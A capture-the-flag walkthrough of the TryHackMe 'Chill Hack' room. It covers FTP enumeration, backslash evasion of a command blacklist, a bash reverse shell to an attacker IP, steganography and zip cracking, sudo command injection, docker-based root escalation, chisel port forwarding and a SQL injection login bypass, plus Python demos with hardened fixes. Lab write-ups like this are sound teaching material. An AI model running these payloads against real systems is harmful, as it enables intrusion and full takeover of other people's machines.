TryHackMe | Chill Hack WriteUp / Walkthrough (English)
Chill Hack
Room Link: https://tryhackme.com/r/room/chillhack
===============================================================
- Start with an nmap scan. Three ports are open: 21, 22 and 80. The -A scan shows that the FTP server on port 21 allows anonymous login, so log in to FTP anonymously and download the file note.txt.
- Now run gobuster against the / directory of the target. The scan returns many results; the interesting one is /secret. That directory hosts a command-execution form. If you try to run ls nothing happens, because the input is filtered, which is exactly what the note from the FTP server warned about.
The note says filtering is in place but not what is filtered, so at this point we do not know. The note also contains two names, which are very likely usernames on the box.
- To get past the filter, put a backslash between the letters of the command name: ls becomes l\s. The filter matches the literal text you typed, so l\s slips through, and when bash performs quote removal it strips the unquoted backslash and runs ls as usual. Once you understand the bypass you can get a reverse shell. https://www.revshells.com/ generates the bash one-liner bash -i >& /dev/tcp/10.18.96.207/1234 0>&1, but it needs two changes to work here: ba\sh -c "ba\sh -i >& /dev/tcp/10.18.96.207/1234 0>&1". A backslash is added to both occurrences of bash, and the inner shell is wrapped in double quotes so it is passed to the outer bash as a single -c argument. Start a Netcat listener on port 1234 on your machine, paste the modified one-liner into the command box and execute it. You will get a shell back.
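The bypass works because the blacklist inspects the raw string while the shell inspects the string after quote removal. The following added example (mine, not code from the room or the writeup) simulates that gap: the word list is an assumption standing in for the box's PHP filter, which the writeup never shows, and the attacker IP 10.18.96.207 and port 1234 are the ones used above. It also shows the hardened form, an allowlist applied after parsing, which the backslash trick cannot defeat.

```python
import shlex
import subprocess

# Constructed stand-in for the blacklist behind /secret. The walkthrough does not
# show the real PHP filter, so this word list is an assumption chosen to reproduce
# the behaviour it describes: "ls" is refused, "l\s" is not.
BLACKLIST = ["ls", "cat", "bash", "nc", "python", "wget"]

# The two payloads from the walkthrough (attacker IP 10.18.96.207, listener port 1234).
REVSHELL_NAIVE = "bash -i >& /dev/tcp/10.18.96.207/1234 0>&1"
REVSHELL_BYPASS = 'ba\\sh -c "ba\\sh -i >& /dev/tcp/10.18.96.207/1234 0>&1"'


def blocked_by_filter(cmd: str) -> bool:
    """Naive substring blacklist: refuses the command if any banned word
    appears literally in the raw input, before any shell parsing."""
    return any(word in cmd for word in BLACKLIST)


def shell_view(cmd: str) -> list:
    """What the shell actually executes. POSIX quote removal (shlex follows the
    same rules) strips an unquoted backslash, so 'l\\s' becomes 'ls'. Inside
    double quotes a backslash is only special before $, backtick, double quote
    and backslash, so the inner ba\\sh survives the outer bash and is dequoted
    by the second bash that -c starts."""
    return shlex.split(cmd)


def execute(cmd: str) -> str:
    """Run the raw string through a real shell, as the vulnerable page does."""
    return subprocess.run(["/bin/sh", "-c", cmd], capture_output=True,
                          text=True, check=False).stdout


# Hardened form: parse first, then check the resolved command word against an
# allowlist. Backslash obfuscation no longer helps, because the decision is made
# on the same token the shell would execute.
ALLOWED_COMMANDS = {"id", "whoami", "date"}


def allowed_after_parsing(cmd: str) -> bool:
    try:
        tokens = shlex.split(cmd)
    except ValueError:  # unbalanced quotes: refuse rather than guess
        return False
    return bool(tokens) and tokens[0] in ALLOWED_COMMANDS


if __name__ == "__main__":
    for c in ["ls", "l\\s", REVSHELL_NAIVE, REVSHELL_BYPASS]:
        print(f"{c!r:70} blocked={blocked_by_filter(c)} shell sees {shell_view(c)}")
    print(execute("ech\\o bypassed"))        # the shell runs echo
    print(allowed_after_parsing("l\\s"))    # False
```

The vulnerable check and the shell disagree about what the input means; any filter that runs before the interpreter has parsed the input can be bypassed with whatever quoting that interpreter removes.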
- Start looking around the machine; the first goal is the user flag. In /home there are 3 users, and the only home directory you can enter is apaar's. It contains the flag file local.txt, but www-data cannot read it. Go back to /var/www, where there are two folders, html and files. html has nothing interesting, but files does: it contains a file called hacker.php.
- cat hacker.php
The file contains an interesting string, "You have reached this far. Look in the dark! ...". "Look in the dark" reminds me of steghide, so the image the page embeds might hide something. The image lives in the images folder inside the current directory. cd images and start a python3 web server there to pull the image back to your machine.
- With the image on your machine, run steghide extract -sf hacker-with-laptop_23-2147985341.jpg, which extracts backup.zip. Trying to unzip it prompts for a passphrase, because the archive is encrypted. Run zip2john backup.zip > zip.hash and then john zip.hash --wordlist=/usr/share/wordlists/rockyou.txt; the password is *********. Use it to unzip the archive, which yields source_code.php.
- source_code.php contains PHP code that accepts a user's email and password and checks whether they are correct.
You can see that it compares the password supplied by the user with a hard-coded correct password that is merely base64-encoded, so decoding that string gives the plaintext. The welcome message tells us the account belongs to Anurodh. We could SSH in as Anurodh right away, but that can wait, because we first want to become apaar in order to retrieve the first flag.
*Note: strictly, you do not need apaar at all: once you log in as Anurodh and run linpeas.sh you will find a vector that gets you root, and as root you can read both flags. For the sake of learning, though, I will keep going and explain how to get apaar.
- sudo -l
Notice that www-data can run a script called .helpline.sh as apaar. Looking at the script, it is vulnerable to command injection because the message you type is handed straight to bash. To exploit it, run the script as apaar with sudo and, when it asks for a message, enter /bin/bash; you get a shell as apaar immediately. Upgrade it to a proper TTY with python and read the user flag ✨.
- With the first flag in hand we no longer need apaar. Log in over SSH as Anurodh with the credentials recovered earlier, which gives a far more stable shell. Then go to /tmp, upload linpeas.sh and run it.
linpeas flags a 95% privilege-escalation vector involving docker. Look up docker on GTFOBins: docker run -v /:/mnt --rm -it alpine chroot /mnt sh mounts the host's / inside the container and chroots into it, dropping you into a root shell on the host filesystem. Run /bin/bash, cd /root and cat proof.txt to get the root flag ✨.
###############################################################################
Now assume you did not look around when you first got access as www-data. There is another route. Upload linpeas.sh and run it: it will point you to .helpline.sh, which gets you the apaar shell as above, and it will also show port 9001 listening on 127.0.0.1 only. You cannot reach that port from your machine; an external nmap scan reports it closed because it is bound to localhost.
- To reach it we need a port forward. There are many ways to do this; I will use chisel. Download a static chisel binary to your machine with wget https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_linux_amd64.gz -q (-q means quiet, no output), gunzip it, make it executable and upload it to the target.
- Port forwarding: on your machine run ./chisel server -p 1234 --reverse & and on the target run ./chisel client 10.18.96.207:1234 R:9003:127.0.0.1:9001 &. The R: prefix makes it a reverse forward, so connecting to port 9003 on your machine is the same as connecting to port 9001 on the target's loopback interface. Pick a server port that is not already taken by another listener on your machine.
- Run an nmap scan against port 9003 on localhost.
It shows Apache. Open http://localhost:9003 and you get a login page.
Start by checking whether the login form is vulnerable to SQL injection. Enter ' or '1'='1' -- - in the username field and anything in the password field. The login succeeds, so the form is indeed injectable.
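To see exactly why that payload logs you in, here is an added example (mine, not code from the room or the writeup) that rebuilds the login check against an in-memory SQLite table. The table, the admin row and its password are constructed; the real schema behind the port-9001 page is not shown in the walkthrough. The vulnerable version concatenates the input into the query text, the safe version binds it as a parameter.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed users table standing in for the one behind the login page."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'S3cretPass!')")
    return conn


# The exact payload from the walkthrough. "--" comments out the rest of the
# statement; the trailing "-" keeps the space after "--" intact, which MySQL
# requires for "--" to start a comment (SQLite does not care).
PAYLOAD = "' or '1'='1' -- -"


def build_vulnerable_query(username: str, password: str) -> str:
    """String concatenation: user input becomes part of the SQL text, so the
    quote in the payload closes the string literal and the rest is parsed as SQL."""
    return ("SELECT username FROM users WHERE username = '" + username +
            "' AND password = '" + password + "'")


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Parameterised query: the driver binds the input as data, so the quote
    and comment characters in the payload never reach the SQL parser."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = make_db()
    print(build_vulnerable_query(PAYLOAD, "x"))
    print("vulnerable:", login_vulnerable(conn, PAYLOAD, "x"))  # admin
    print("safe:      ", login_safe(conn, PAYLOAD, "x"))        # None
```

The concatenated query becomes SELECT username FROM users WHERE username = '' or '1'='1' -- -' AND password = 'x', so the password check is commented away and the OR makes the WHERE clause true for every row; the first row returned is the account you are logged in as.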
- After logging in you are redirected to hacker.php. If you remember, this is the same page we looked at in step 5.
If you save the hacker picture, run steghide on it and follow steps 5 to 7 as before, you recover the credentials, get access to the machine, and then get root through docker as above.